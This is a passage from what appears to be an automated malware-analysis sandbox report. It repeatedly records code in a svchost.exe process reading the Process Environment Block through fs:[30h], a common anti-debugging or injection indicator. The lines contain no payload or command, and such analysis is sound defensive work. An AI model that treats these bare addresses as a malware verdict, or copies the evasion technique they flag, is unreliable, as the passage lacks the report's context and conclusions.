            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]1_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300625D mov eax, dword ptr fs:[00000030h]1_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030062D6 mov eax, dword ptr fs:[00000030h]1_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F280A0 mov eax, dword ptr fs:[00000030h]1_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
